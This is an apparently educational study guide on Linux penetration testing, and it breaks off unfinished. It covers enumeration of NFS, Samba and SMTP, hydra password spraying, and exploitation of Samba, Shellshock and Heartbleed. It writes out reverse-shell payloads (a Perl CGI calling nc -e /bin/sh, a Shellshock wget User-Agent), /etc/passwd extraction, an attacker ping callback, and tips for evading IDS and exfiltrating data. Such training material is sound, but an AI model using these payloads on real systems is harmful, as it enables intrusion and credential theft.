WIP - Linux Exploitation

Linux and other variants of UNIX make up a very large segment of the overall internet infrastructure (including Critical Infrastructure).

This document is still in progress...

Information Gathering

The information gathering and enumeration phases of any penetration test are considered the most important.

It is the results of these phases of the engagement that lead us to identify vulnerabilities and misconfigurations, and ultimately to exploitation.

Remote Enumeration - Study Guide

Remote Enumeration is the process of gathering as much information as possible about a target system from an across-the-network perspective, using all of the tools we have at our disposal.

OS Fingerprinting Re-cap

As a typical first step in identifying the OS of a target, we can use nmap:

# --osscan-guess enables aggressive OS detection
nmap -O --osscan-guess <ip_address>

# Open ports that are usually returned from a port scan can offer OS insights
nmap -v -sT -O <ip_address>

The remote enumeration phase often begins with port scans of both TCP and UDP ports on the target system(s), including service version fingerprinting (-sV). This can be accomplished with a single nmap command:

nmap -v -sS -sU -sV -n 192.168.0.1/24

Enumerating NFS

One commonly found service is the Network File System (NFS) protocol, an RPC-based file sharing protocol often configured on Unix-like systems. It is typically used to provide access to shared resources and can be found listening on TCP and/or UDP port 2049. nmap can easily identify a system running NFS. Note that since NFS is an RPC-based service that relies on other RPC services (such as mountd), nmap's NSE scripts query it via the Portmapper service, which is found on TCP and/or UDP port 111:

nmap -sT -sU -sV -p2049 <ip_address>

An administrator wishing to share files from an NFS server will configure what are known as "exports": the mechanism NFS uses to export directories, in other words, to make entire directories available to other users over the network. Exports configured for any given NFS server can usually be found locally in the /etc/exports file on the target host.

One common issue with NFS is that administrators often configure exports with little attention to security, exporting directories in a manner that allows any host or IP address to connect without any authentication and, if you're lucky, with write access to the exported directories.
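For illustration, a hypothetical /etc/exports might contain entries like the following (the paths and addresses are made up); the first line is the insecure, wide-open case, the second a whitelisted one:

```
/home/bob       *(rw,no_root_squash)     # writable by any host, no authentication
/srv/backups    192.168.0.10(ro)         # read-only, single whitelisted host
```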

Once we've identified that a server is running NFS, the first thing we want to do is query it with several nmap NSE scripts (nfs-ls, nfs-showmount and nfs-statfs). We can find them with:

ls /usr/share/nmap/scripts/ | grep nfs

# now we can obtain results relevant to NFS:
nmap --script nfs-ls,nfs-showmount,nfs-statfs <ip_address>

Alternatively we can use the built-in showmount command with the -e or --exports switch to show any exports available to us. However, it won't return as much information as nmap:

showmount -e <ip_address>

Ideally, an administrator would want to explicitly define (whitelist) IP addresses or hosts that should be allowed to connect to the NFS server. Even in the case where our access is restricted due to an NFS whitelist configuration like the above, the output still gives us valuable information regarding which IP addresses or hosts can mount any available exports. In this scenario, that information would be useful in the case we can either spoof our IP address to match a whitelisted IP address or take control of a host which is allowed to connect.

Once we've gathered the relevant NFS server information and have confirmed a misconfiguration, we can attempt to mount the available exported directories. This can be accomplished by first creating a temporary directory as your mount point, and then the exported NFS directory can be mounted:

mkdir -p /mnt/home/bob
mount -t nfs <nfs_server_ip>:/home/bob /mnt/home/bob -o nolock
mount # verify the new mount is listed
cd /mnt/home/bob && ls -al

Enumerating Portmapper (rpcbind)

Portmapper (or rpcbind) is another common service found on Linux-based systems and is used to essentially "map" RPC or "ONC RPC" (Open Network Computing Remote Procedure Call) services to their corresponding TCP or UDP ports on a target system.

Information gleaned from the portmap service can offer insight regarding ports that are listening on a machine, but that may not necessarily be accessible over the network. A target system may be running a custom RPC service that is only accessible from the local host or may be running NFS, but only accessible from the local network, etc. Knowing this information can give us more insight to local services that may be running which could help us in further exploiting a system if and when local access has been obtained. Portmapper is typically found listening on ports TCP/UDP 111 and in some cases ports TCP/UDP 32771 and can be enumerated using nmap NSE scripts, or by using the built-in rpcinfo command.

Querying a single port (TCP/111) essentially enumerates all related RPC service ports without us having to conduct a port scan against all those ports individually. Furthermore, it gives us knowledge of which ports the system has open locally (bound to localhost), which we couldn't normally identify with a usual port scan.

nmap's rpcinfo and rpc-grind NSE scripts can be used to enumerate the Portmapper and associated RPC services:

nmap --script rpc-grind,rpcinfo <ip_address> -p 111

# the stand-alone rpcinfo command can also give similar results
rpcinfo -p <ip_address>
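The output might look something like the following (the port values here are illustrative); the RPC program numbers map to registered services such as nfs and mountd:

```
   program vers proto   port  service
    100000    4   tcp    111  portmapper
    100003    3   tcp   2049  nfs
    100005    3   udp  47263  mountd
```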

SMB (Samba)

Samba is a Linux-based implementation of the SMB/CIFS protocols that provides print and file sharing services to Windows clients within an environment. Recent versions can also be seamlessly integrated with Active Directory domains. Samba can offer us a great deal of information when enumerated properly.

Depending on the configuration, we can obtain OS version, user accounts on the system, file shares, their permissions and potentially sensitive data, and, depending on its integration with Active Directory, can be used to enumerate much more information. Improperly configured Samba servers can also lead to remote code execution among other things.

Samba can be trivially identified with a version scan against the NetBIOS ports:

nmap -sT -sU -sV <ip_address> -p137,138,139,445 --open

There are several smb-related NSE scripts to get an idea of the shares that are available on the target. We can use:

nmap --script smb-enum-shares <ip_address>

Alternatively we can also use smbclient to obtain similar info about shares, including Workgroup and NetBIOS name. Simply hitting 'Enter' at the authentication prompt to obtain results also confirms that anonymous or guest access to the Samba server is enabled:

smbclient -L <ip_address>

In addition to simply listing shares which we have access to, we also want to know what type of access we have to which shares (read only, write, etc) with smbmap:

smbmap -H <ip_address>

Once we've identified shares, we have several options for interacting with them:

smbclient \\\\<ip_address>\\<share_name>

# or

mkdir /mnt/folder
# apt install cifs-utils
mount -t cifs //<ip_address>/<share_name> /mnt/folder
cd /mnt/folder && ls -las

SMB Users

Enumerating users when it comes to Samba or over SMB can be accomplished in several ways.

Method #1: bash "for loop" and rpcclient

Using rpcclient and a list of potential usernames we've gathered from other phases of information gathering:

for u in $(cat users.txt)
do
    rpcclient -U "" <ip_address> -N --command="lookupnames $u"
done | grep "User: 1"

There are several options available with rpcclient. Some useful commands include lookupsids, netshareenum, srvinfo and enumprivs.

Method #2: Automated (enum4linux)

enum4linux can be used to enumerate the following:

  • Operating system

  • Users

  • Password Policies

  • Group Membership

  • Shares

  • Domain/Workgroup Identification

enum4linux <ip_address>

Enumerating SMTP Users

You're probably familiar with the HELO, RCPT or MAIL verbs if you've ever sent an email while directly connected to an email server via telnet or some other way.

The following information applies to both Windows and Linux-based mail servers, since SMTP is the underlying protocol, but since a large majority of mail servers in use are Linux-based, we'll be focusing on enumerating users from sendmail. In the wild, you'll mostly encounter sendmail, postfix, exim or Microsoft Exchange.

Similar to the user enumeration process for SMB users, there are several ways to accomplish this task, either using manual methods or using tools designed for the purpose of enumerating users from a mail server.

The first task is to enumerate which options, verbs or features are enabled on an SMTP server, usually found on TCP/25:

nmap --script smtp-commands <ip_address> -p 25

# or

nc <ip_address> 25

# or 

telnet <ip_address> 25

We are interested in: RCPT, VRFY and EXPN.

Using RCPT TO, we can enumerate users via direct connection to the mail server with either telnet or nc.

telnet <ip_address> 25
HELO <hostname>
MAIL FROM: <email_address>
RCPT TO: <username>

Valid users will return a Status code of 250 2.1.5 while a 550 5.1.1 status code and User unknown message denotes a non-existent user.
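A hypothetical session might look like the following (the banner, hostname and addresses are illustrative):

```
telnet <ip_address> 25
220 mail.example.com ESMTP Sendmail
HELO test
250 mail.example.com Hello, pleased to meet you
MAIL FROM: test@example.com
250 2.1.0 test@example.com... Sender ok
RCPT TO: root
250 2.1.5 root... Recipient ok          <-- valid user
RCPT TO: nosuchuser
550 5.1.1 nosuchuser... User unknown    <-- non-existent user
```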

Another feature we can use to enumerate users is the EXPN feature, which was designed to query a mail server for the list of members within a mailing list on a server.

The typical command would be EXPN mailing-list-name or EXPN username.

Valid users will return a Status Code of 250 2.1.5 while 550 5.1.1 status code and User unknown message denotes a non-existent user.

Lastly, the VRFY request can also be used and is more common than the EXPN method. The same command line can be used with VRFY, and the results are similar to the EXPN output; the same status codes are used.

smtp-user-enum is a great tool that automates the user enumeration process for SMTP. smtp-user-enum tests all three methods, RCPT, EXPN and VRFY against a list of users:

smtp-user-enum -M VRFY -U users.txt -t <ip_address>
smtp-user-enum -M EXPN -u admin1 -t <ip_address>
smtp-user-enum -M RCPT -U users.txt -T mail-server-ips.txt
smtp-user-enum -M EXPN -D example.com -U users.txt -t <ip_address>

Local Enumeration - Study Guide

We go for local enumeration once we've obtained access to a Linux machine.

  • either as a low privileged or high privileged user

  • via a shell

  • through a web application

... with the ultimate goal of obtaining higher-level access to our current machine and access to other machines within an environment as a result of information obtained from our exploited host.

Network Information

We can ask ourselves some important questions:

  • How is the exploited machine connected to the network?

  • Is the machine multi-homed? Can we pivot to other hosts in other segments?

  • Do we have unfettered outbound connectivity to the internet or is egress traffic limited to certain ports or protocols?

  • Is there a firewall between me and the other devices/machines?

  • Is the machine I'm on communicating with other hosts? If so, what is the purpose or function of the hosts that my current machine is communicating with?

  • What protocols are being used that are originating from my actively exploited machine? Are we initiating FTP connections or other connections (ssh, etc) to other machines?

  • Are other machines initiating a connection with me? If so, can that traffic be intercepted or sniffed as cleartext in transit? Is it encrypted?

Ifconfig

Used to get information regarding our current network interfaces. We want to know what our IP address is, and whether or not there are additional interfaces that we may be able to use as pivots to other network segments.

ifconfig -a

route

Used to print our current network routes, which includes our gateway. Knowing what our static routes and gateway are can help us in case we need to manually configure our network interfaces, pivot to other network segments or will come in handy if we decide to execute ARP-poisoning or other MITM attacks.

route -n

traceroute

Sometimes we'll want to know how many hops there are between our compromised machine and other network segments:

traceroute -n <ip_address>

DNS Information

  • What machine is resolving our DNS queries?

  • Can we use it to exfiltrate data over a DNS tunnel?

  • Is the DNS server vulnerable to any exploits?

  • Is it an Active Directory controller?

cat /etc/resolv.conf

ARP Cache

The system's ARP cache can give us a bit of situational awareness regarding machines near us, or machines that our currently exploited system communicates with for one reason or another. This information is useful when determining who we're communicating with, what's being communicated, and whether that traffic or communication has any value to us from an exploitation perspective, such as credentials transmitted in cleartext:

arp -en

netstat

Gives us insight regarding:

  • What other machines or devices we are currently connected to.

  • Which ports or services on other machines we are connected to.

  • What ports our current machine is listening on.

  • Whether other systems are establishing connections with our current machine.

We can list all TCP and UDP connections to other systems and listening services with:

netstat -auntp

In the rare case you're on a very restricted system and the netstat command is missing, you can get similar information from the /proc/net/tcp and /proc/net/udp files.
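As a sketch of how those files can be read by hand: the addresses in /proc/net/tcp are stored as little-endian hex. A small bash helper (the name hex2ip is hypothetical) can convert them to dotted-decimal form:

```shell
#!/bin/bash
# Convert the little-endian hex IP addresses found in /proc/net/tcp
# (e.g. the "0100007F" in an entry like "0100007F:0016") to
# dotted-decimal notation by reversing the byte order.
hex2ip() {
    local h=$1
    printf '%d.%d.%d.%d' "0x${h:6:2}" "0x${h:4:2}" "0x${h:2:2}" "0x${h:0:2}"
}

hex2ip 0100007F    # prints 127.0.0.1
echo
# The port part (":0016") is plain big-endian hex: 0x16 = port 22 (ssh)
printf '%d\n' 0x0016
```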

ss

An alternative to netstat that we can use to list active network connections.

ss -twurp

Gives another perspective on established connections, bytes being transferred, and the processes/users responsible for the connections.

Outbound Port Connectivity

Another thing we want to check is whether or not our outbound port connectivity is restricted in any way.

Knowing this information will be useful if we need to establish outbound connections to other systems we control for the purpose of maintaining access or exfiltrating data.

A quick way we can check outbound port connectivity status is with portquiz.net, a web server that listens on most TCP ports. We can use it to confirm we can connect to arbitrary ports outside of our network with a quick nmap scan:

nmap -sT -p4444-4450 portquiz.net

Keep in mind that any scans originating from your compromised machine can alert network administrators to anomalous activity. Consider using nmap's -T (timing) option at a low value to stay under any internal IDS radar.

Network Information Commands

cat /etc/resolv.conf            # DNS Server
ifconfig -a                     # list current network interface configuration
route                           # current network route information
traceroute -n <ip_address>      # trace our route across network segments
arp -a                          # list our ARP cache
netstat -auntp                  # established and listening TCP/UDP ports/connections
ss -twurp                       # listing active connections, processes, users and bytes
nmap -sT -p5555 portquiz.net    # check outbound firewall rules

System Information

The System Information gathering phase is much like the Network Information phase, except we're getting much more data. Our goal with this phase is to get information regarding:

  • OS and Kernel

  • Env Variables

  • Interesting Files and Sensitive Information

  • Users, Groups, Permissions and Privileges

  • Services and Associated Configuration Files

  • Cron Jobs, System Tasks

  • Installed Applications and Versions

  • Running Processes

Our ultimate objective from this portion of the testing is to elevate our privileges once we've obtained access to a system or systems and obtain additional footholds within an environment as a result of the information we obtain.

id                    # current user information
uname -a              # kernel version
grep $USER /etc/passwd # Current User Information from /etc/passwd
lastlog               # most recent logins
w                     # who is currently logged onto the system
last                  # last logged on users

# all users including UID and GID information
for user in $(cat /etc/passwd | cut -f1 -d":"); do id $user;done

# List all UID 0 (root) accounts
cat /etc/passwd | cut -f1,3,4 -d":" | grep ":0:0$" | cut -f1 -d":"

cat /etc/passwd       # Read passwd file
cat /etc/shadow       # check readability of the shadow file
sudo -l               # what can we sudo without a password
cat /etc/sudoers      # can we read /etc/sudoers file?
cat /root/.bash_history # can we read root's .bash_history file?
cat /etc/issue        # OS
cat /etc/*-release    # OS

# can we sudo known binaries that allow breaking out into a shell?
sudo -l | grep vim
sudo -l | grep nmap
sudo -l | grep vi

ls -als /root/        # can we list root's home directory?
echo $PATH            # current $PATH env variable
cat /etc/crontab && ls -als /etc/cron*    # list all cron jobs
find /etc/cron* -type f -perm -o+w -exec ls -l {} \; # find world-writeable cron jobs
ps auxwww             # list running processes
ps -u root            # list all processes running as root
ps -u $USER           # list all processes running as current user
find / -perm -4000 -type f 2>/dev/null    # Find SUID files
find / -uid 0 -perm -4000 -type f 2>/dev/null    # Find SUID files owned by root
find / -perm -2000 -type f 2>/dev/null           # Find SGID files
find / -perm -2 -type f 2>/dev/null              # Find world-writable files
ls -al /etc/*.conf                               # list all conf files in /etc/
grep -i pass /etc/*.conf  # Find conf files that contain the string "pass"
lsof -n                   # list open files
dpkg -l                   # list installed packages (debian)

# Common software versions
sudo -V 
httpd -v
apache2 -v
mysql -V
sendmail -d0.1

# print process binaries/paths and permissions
ps aux | awk '{print $11}' | xargs -r ls -la 2>/dev/null | awk '!x[$0]++'

LinEnum

An automated information gathering tool that takes care of much of this local enumeration process.

LinuxPrivChecker

Privilege escalation method finder.

unix-privesc-check

Script for finding common misconfigurations which can help us elevate our privileges on a Linux-based system.

mimipenguin

A tool we can use to dump the logon password of the currently logged-on user; this should be done during the post-exploitation phase.

Exploitation over the Network

Remote Exploitation Introduction - Study Guide

Once we've identified vulnerabilities or misconfigurations as a result of the Information Gathering phase, the next logical step is to continue our enumeration and move into the exploitation phase.

Password Spray Attack / Reverse Brute-Force attack

Rather than the usual dictionary brute-force methods involving hundreds of thousands, if not millions, of password entries, the idea is to reverse the process: introduce a list of as many users as possible, while trying just a single password against tens or hundreds of user accounts.

This method reduces the potential for account lockouts and, in some cases, allows us to stay "under the radar" when attempting single passwords against many users. To successfully execute a password spray attack, we must first gather as many usernames as possible for our target organization or target system.

We can use tools such as theHarvester to get an idea of user naming conventions organizations are using for their users. Utilizing more than one tool to help compile an initial user list will only help us in our quest.

For enumerating SMTP users we can use smtp-user-enum, as well as several manual methods such as VRFY and EXPN. Metasploit also contains an auxiliary scanner module known as smtp_enum.

First we'll need to create our initial user list. We can quickly create a list of 50 users with the following command, where john.txt is taken directly from the Statistically Likely Usernames list:

head -n 50 john.txt >> users.txt

Once we've created our initial list of users, combined with users we've gathered from other phases of testing, we can execute our user enumeration process using the Metasploit smtp_enum module against our target SMTP server:

msf > use auxiliary/scanner/smtp/smtp_enum
msf > set RHOSTS <ip_address>
msf > set USER_FILE users.txt
msf > run

When the scanner completes (which may take several minutes depending on how many users are in our list), we can see that we've validated several users that we can use for our password spray attack. We can now create a list of validated users. Add those to your valid_users.txt file (one per line) with any others you may have validated during information gathering.

The more users we can validate, the higher the probability that our password spray attack will succeed; so aim to create as large a list as possible, of validated user accounts.

Now that we have validated some users, we should determine one (recommended) or two (maximum) commonly-used passwords we can use for our attack.

Regarding commonly used passwords, real-world experience has shown that one of the most common is the current season followed by the current year, e.g., Spring2018.

You'll be surprised at how many times you will come across multiple users, within the same environment, using the exact same password in the "Season[Year]" format. Use this lack of password complexity enforcement, and the human tendency to choose easy-to-remember passwords, to your advantage.

Another very common password is "CompanyName" followed by a numerical value, e.g., FooCorp01, FooCorp02, etc.

For our password list, we'll start with just using Spring2018 as it's very common. Use your imagination when picking a password that relates to your target in some way or another.

In environments where password complexity is not enforced (a common observation in Linux-based networks), users will take advantage of easy-to-remember passwords that they modify by simply changing a value or other characteristic over time (e.g., Password01 to Password02, or Summer2018 to Fall2018).

From month to month and season to season, making minor modifications to their passwords will be enough to satisfy the system's password policy.
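As an illustration, a tiny bash snippet (the file name passwords.txt is an assumption) can generate the "Season+Year" candidates for the current and previous year:

```shell
#!/bin/bash
# Build a small Season+Year candidate list for the current and
# previous year (8 candidates total). Illustrative only.
year=$(date +%Y)
for y in "$year" "$((year - 1))"; do
    for season in Spring Summer Fall Winter; do
        echo "${season}${y}"
    done
done > passwords.txt

wc -l < passwords.txt    # 8 entries
```

Remember: for an actual spray run you'd pick only one (recommended) or two (maximum) of these per attempt, not the whole list.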

Now that we have a list of users we've validated, and a list containing two very common passwords, we can start our password spray attack against other services on our target machine.

Also keep in mind that password re-use is also a frequent issue and passwords may be reused across systems within an environment.

First let's determine some other services that are listening on our target system that we can execute a password spray attack against using nmap :

nmap -sT <ip_address> --open --max-retries 1 -n

We have now determined several services we can execute our password spray attack against: ssh, smtp and smb, as they all utilize some form of authentication.

We'll use ssh just to demonstrate that we can use one particular service (such as SMTP) to enumerate valid users that we can then use to attack an unrelated service, such as ssh.

To summarize:

  1. We've created a list of users gathered through our information gathering phase, in addition to using usernames from the Statistically Likely Usernames list.

  2. We've confirmed valid users using SMTP user enumeration with the smtp_enum Metasploit scanner module.

  3. We've created our list of validated user accounts, and a list containing two commonly-used passwords.

  4. We've determined several services on our target machine we can execute our password spray attack against and have decided on ssh.

Now that all those pieces are in place, we can execute our password spray attack against the SSH service. THC-Hydra is a well-known and tested brute-force tool.

With hydra we can supply our list of users (-L) and our password list (-P), and specify the service we'd like to attack (ssh), with a command line similar to the following:

hydra -L users.txt -P passwords.txt ssh://<ip_address>

Once we've obtained valid credentials for a single user, we can also exploit the common case of "password reuse" within an environment.

Using the obtained credentials, we can then use those to attempt to log in to other SSH-enabled machines as our user. This often results in access to multiple systems which can then later be used as pivots to other areas of the network or to maintain multiple footholds, etc.

Of course, this can also be done with Hydra, and in a single sweep we can determine other systems on the network, which allow access using the same credentials we've cracked. We would use the -M parameter to specify a list of ssh servers. Something like the following:

hydra -l david -p Spring2018 -M ssh_servers.txt ssh

Where ssh_servers.txt is a file containing your ssh target servers, one per line.

In addition to trying your password spray attack against the ssh service, we encourage you to also experiment with brute-forcing SMB or any other listening services that accept user credentials.

Metasploit's smb_login scanner module can be used to obtain similar results for password spray attacks against SMB services.

Aside from targeting Linux-based systems with password spray attacks, the same concept is, of course, valid for any type of environment or platform, as long as the service provides a means to authenticate to it.

With that said, password spray attacks are also known to be very successful against platforms such as Outlook Web Access or Exchange Portals.

Try this attack using Metasploit's owa_login brute-force module on OWA portals you are authorized to test; the password spray method is often very effective there.

A Word of Caution Regarding Password Spraying

Depending on system configurations, Password Spray Attacks can be detected and thwarted, which is why it is crucial to only attempt one (recommended) to two (maximum) passwords during a single run.

Take extra care that whichever tool you're using isn't trying blank passwords or other variations in addition to whatever is in your password list.

This would add to the authentication attempts and likely result in account lockouts or detection by a SIEM or other anomalous-event detection solution.
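A quick sanity check (the file name passwords.txt is an assumption) to make sure the list contains no blank entries before feeding it to a tool:

```shell
#!/bin/bash
# Create a sample two-entry password list, then verify it has no
# blank lines that would silently add extra authentication attempts.
printf 'Spring2018\nFooCorp01\n' > passwords.txt

if grep -q '^$' passwords.txt; then
    echo "blank entries found - clean the list first"
else
    echo "no blank entries"
fi
```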

Furthermore, if a password spray run is unsuccessful the first time around, wait 45 minutes and try again with new passwords in your list.

Multiple attempts within a certain time-range can also result in detection and/or lockouts.

Exploiting Samba - Study Guide

Samba is quite commonly found within Linux-based environments, as it typically provides file sharing services to both Windows and Linux users.

It's also a ripe target when configured incorrectly, and versions up to 4.6.4 contain vulnerabilities that allow an attacker to completely take control of an affected server. This was most recently seen with CVE-2017-7494, sometimes referred to as SambaCry.

It will be important that we identify the exact version of Samba, identify vulnerabilities that exist in either the version or the configuration, and then move on to exploitation of the system.

The first task is identifying that Samba is installed on the system and, furthermore, identifying the version of Samba; this can be accomplished with an nmap smb-os-discovery script scan against port 445:

nmap --script smb-os-discovery -p445 <ip_address>

Once the version of Samba is known, we can start to investigate exactly which vulnerabilities might be present for that particular version.

searchsploit is an excellent tool for this and allows us to search all vulnerabilities for a particular piece of software directly from the Linux command line. searchsploit is a local database of the exploits that can also be found online (www.exploit-db.com).

searchsploit samba 3.0.20

From its results we can see that we have a potential vulnerability candidate, along with an indicator that a Metasploit module is available.

Username Map Script: CVE-2007-2447

This vulnerability was discovered in 2007 by an anonymous researcher and affects Samba versions 3.0.0 through 3.0.25rc3. It exists in non-default configurations where the "username map script" option is enabled, and results in remote command execution and compromise of the affected server.

msf> use exploit/multi/samba/usermap_script
msf> set RHOST <ip_address>
msf> set LHOST <ip_address>
msf> exploit

Once the exploit completes, we have a command shell session we can immediately start interacting with.

In order to have a proper Pseudo TTY:

python -c 'import pty; pty.spawn("/bin/sh");'

Another vulnerability is the result of a particular misconfiguration in Samba, but with sometimes catastrophic consequences. It essentially allows an attacker to create a symbolic link to the root partition from a writeable share, ultimately allowing read access to the entire file system outside of the share directory.

Although this vulnerability can be exploited using smbclient alone, Metasploit also contains a module for it.

A prerequisite for this particular vulnerability is that the Samba server contains a writeable share and that the wide links parameter in the smb.conf file is set to yes. We can use the following smbmap command to determine the shares available to us on a Samba server, in addition to determining whether or not we have read or write permissions to a given share:

smbmap -H <ip_address>
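For reference, the misconfiguration described above might look like this in smb.conf (the share name and path are hypothetical):

```
[global]
    wide links = yes
    unix extensions = no

[public]
    path = /srv/public
    writeable = yes
    guest ok = yes
```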

Once we've determined a writeable share is available, we can use Metasploit's samba_symlink_traversal auxiliary module to create the symlink to the root filesystem.

smbclient \\\\<ip_address>\\<folder> -N
# -N anonymous access to the share 

Downloading/uploading files can be achieved through get/put commands.

Additionally, another useful smbclient command for data exfiltration during post-exploitation tasks is the tar command:

smb: \> tar c /tmp/allfiles.tar *

Writeable Samba Share to Remote Command Execution via Perl Reverse Shell

We will cover what we can do in certain situations where we have a fully patched Samba server, but have a writeable share available to us, and can exploit that scenario for remote command execution, in this case, a reverse shell.

In this case, we discover that a server we have enumerated is running a patched Samba server and contains a share named www, which appears to be configured to allow administrators to easily update an internal web application.

We first determine the OS and Samba version:

nmap --script smb-os-discovery -p445 <ip_address>

We also determine any shares that are available to us, as well as seeing that Guest sessions to the shares are possible as well:

smbmap -H <ip_address>

Discovering a writeable web root share is interesting for several reasons:
  1. Web roots often contain files specific to a web server configuration and can furthermore be used to obtain credentials to other services (e.g., MySQL).

  2. Being able to write to a web root is even better, depending on the web server configuration. For instance:

    1. Is PHP installed?

    2. Are there any other web server-interpreted languages we can use to our advantage?

    3. Can we upload any files to this directory?

    4. How will the web server handle our files?

    5. Can we exploit that to obtain remote command execution?

Our first task is to connect to the share and have a look at its contents; secondly, we'll want to determine whether the Samba server has any HTTP ports listening which might be serving the contents of the share.

We can connect to the share with smbclient and execute the linux ls command to list files within the directory:

smbclient \\\\<ip_address>\\<share_name> -N

The presence of files with a .pl extension suggests the server is likely configured to process Perl. Knowing this, it's time to scan the web server ports to confirm we have a web server running:

nmap -sT <ip_address> --max-retries 1 -n --open

Let's create a file locally on the attacker system called test.pl. This file will execute the id Linux system command and display the current UID and GID information when accessed with a browser.

#!/usr/bin/perl

print "Content-type: text/html\n\n";
system("id");

And then:

smbclient \\\\<ip_address>\\www -N
smb: \> put test.pl

Now if we point a browser to our test.pl, the output of the id command is shown. From this point, we can utilize some tools that have already been written to get a reverse shell on the system. The script itself will require some minor modifications before we can use it (such as the $ip and $port values). Once modified, upload it to the target via smbclient. Open a nc listener first:

nc -nlvp 1234

Alternatively, instead of using a pre-made Perl reverse shell, we could write our own script:

#!/usr/bin/perl

print "Content-type: text/html\n\n";
system("nc <ip_address> 1234 -e /bin/sh");
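On the attacker side, templating that CGI payload with the listener's address before uploading it can be scripted. A minimal sketch, with function name and addresses purely illustrative:

```python
def build_perl_cgi(ip: str, port: int) -> str:
    """Render a Perl CGI reverse-shell stub for the given listener."""
    return (
        "#!/usr/bin/perl\n\n"
        'print "Content-type: text/html\\n\\n";\n'
        f'system("nc {ip} {port} -e /bin/sh");\n'
    )

# Example listener address (illustrative).
payload = build_perl_cgi("192.168.0.5", 1234)
print(payload)
```

The rendered file would then be uploaded with smbclient's put command, as shown above.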

Exploiting Shellshock - Study Guide

"Shellshock" or "Bashdoor", disclosed on September 24th, 2014, is yet another vulnerability that shook the information security industry. Within hours of its release, thousands of devices and systems had already been compromised, and botnets were created to exploit it en masse.

The vulnerability was discovered in the Unix Bash shell and affected CGI programs on web servers, OpenSSH, DHCP clients and several other attack vectors.

The discovery of Shellshock resulted in several CVEs being assigned to different attack vectors:

  • CVE-2014-6271

  • CVE-2014-6277

  • CVE-2014-6278

  • CVE-2014-7169

  • CVE-2014-7186

  • CVE-2014-7187

We'll focus on the CGI attack vector.

To start understanding Shellshock, let's take a look at one method that was released to determine if a system was vulnerable from a local-system perspective. The following example relates directly to the initial CVE that was assigned (CVE-2014-6271). When executed on a vulnerable system, the shell would echo "vulnerable" as seen below:

env x='() { :;}; echo vulnerable' bash -c "echo this is a test"

# When executed in a vulnerable bash shell, this defines an environment
# variable called "x" that contains a function definition.

# The trailing "echo vulnerable" sits outside the function body, but a
# vulnerable bash executes it anyway while importing the variable.

One of the primary attack vectors seen in the wild following the disclosure of Shellshock was the modification of User-Agent strings to include Shellshock payloads intended to run commands on the remote server. One example seen in-the-wild was a "recon" test which would confirm to an attacker that a particular system was vulnerable; this was accomplished by modifying the sent User-Agent string to include a ping command destined for the attacker's machine, along with a unique payload pattern.

If the attacker system receives the unique payload string, then this serves as confirmation that the system ran the ping command. The attacker could then tie it back to a specific vulnerable system for further exploitation later.

The User-Agent string for that test would have been something like the following:

User-Agent: () { :;}; ping -c 5 -p unique_string attacker.machine
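Generating such a recon header per target, with a unique marker so ping replies can be tied back to each host, could be sketched as follows. The function name and attacker hostname are illustrative, and the 16-hex-digit marker matches what ping's -p pad option accepts:

```python
import uuid

def shellshock_ua(attacker_host: str, count: int = 5):
    """Build a Shellshock recon User-Agent with a unique ping pad pattern."""
    marker = uuid.uuid4().hex[:16]  # ping -p accepts up to 16 hex digits
    ua = f"() {{ :;}}; ping -c {count} -p {marker} {attacker_host}"
    return ua, marker

ua, marker = shellshock_ua("attacker.machine")
print(ua)
```

The marker can be logged alongside the target address so a captured ICMP payload identifies which host executed the command.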

Now that we've covered a little bit of the history of Shellshock, and some basics about its exploitation, we can start applying our knowledge to an actual scenario. Since we know that a primary attack vector was against vulnerable CGI programs, let's have a look at some things we can do to identify vulnerable programs and systems, and then exploit.

One of the first things we need to do is locate CGI programs on a potentially vulnerable system; we can do this with an excellent tool called dirsearch, which executes dictionary-based attacks against web servers in search of interesting files, directories, etc.

./dirsearch.py -u http://<ip_address>/ -e cgi -r

Now that we've identified a CGI file on the server, let's first confirm that we can access the file with a browser; maybe the page contains some hints as to its purpose.

We can then use the http-shellshock nmap NSE script:

nmap --script http-shellshock --script-args uri=/cgi-bin/login.cgi <ip_address> -p 80

There are multiple ways to exploit Shellshock to gain control over a system. If exploitation is successful, we can execute any command we want on the remote system as the web server user. For example, we could retrieve /etc/passwd with wget:

wget -U "() { foo;};echo \"Content-type: text/plain\"; echo; echo; /bin/cat /etc/passwd" http://<ip_address>/cgi-bin/login.cgi && cat login.cgi

This will issue a GET request to the target system, use a Shellshock-ified User-Agent (-U) to echo the contents of /etc/passwd into the response, save that response to a local file on our attacker system (login.cgi), and then display its contents (&& cat login.cgi).

If successful, we should see the contents of the target system's /etc/passwd file displayed in our terminal.
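The same request can be issued from a script by setting the malicious User-Agent explicitly. The sketch below only constructs the request object (no connection is made), and the URL is a placeholder:

```python
import urllib.request

url = "http://192.0.2.10/cgi-bin/login.cgi"  # placeholder target
payload = ('() { foo;};echo "Content-type: text/plain"; '
           "echo; echo; /bin/cat /etc/passwd")

# Attach the Shellshock payload as the User-Agent header; a vulnerable
# bash-backed CGI handler evaluates the function-definition prefix.
req = urllib.request.Request(url, headers={"User-Agent": payload})
print(req.get_header("User-agent"))
```

Calling urllib.request.urlopen(req) would then send the request, equivalent to the wget -U command above.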

Now we could even run a reverse shell:

wget -U "() { foo;};echo; /bin/nc <ip_address> <port> -e /bin/sh" http://<ip_address>/cgi-bin/login.cgi

Exploiting Heartbleed - Study Guide

Heartbleed, which surfaced in 2014, was a critical bug affecting OpenSSL versions 1.0.1 through 1.0.1f. It allowed the reading of data stored in a server's memory due to a faulty implementation of the heartbeat extension (RFC 6520) of the TLS (Transport Layer Security) and DTLS (Datagram Transport Layer Security) protocols.

In addition to the "dumping" of arbitrary data from a server's memory, which could include anything from application credentials to any other sensitive data residing in memory at a given moment, it also allowed for the dumping of the private key responsible for securing that data over SSL.

Having this information would allow an attacker to intercept all SSL traffic to and from the affected server, among other things.

There are several tools in circulation which allow for the exploitation of affected OpenSSL implementations. We'll do a walkthrough with the modules included within the Metasploit Framework.

First, we need to identify a vulnerable OpenSSL implementation; this can be done with either nmap or Metasploit. nmap includes an NSE script, ssl-heartbleed.nse, which can be used to confirm our target is vulnerable with the following command line:

nmap --script ssl-heartbleed <ip_address>

Once we have confirmed our target is vulnerable, we can use Metasploit's openssl_heartbleed auxiliary scanner module to dump encrypted memory contents:

msf> use auxiliary/scanner/ssl/openssl_heartbleed

In most scenarios, we can stick with the defaults in regard to the module options. However, this particular module contains several Auxiliary actions, which we can see by running the show actions command.

Run the set action DUMP command, set the RHOSTS value, then run the module. Metasploit will store the results of the "leaked" data as a .bin file in your ~/.msf4/loot directory.

We can simply now run the strings command against the .bin file to see if we were able to leak anything we can use for our purposes:

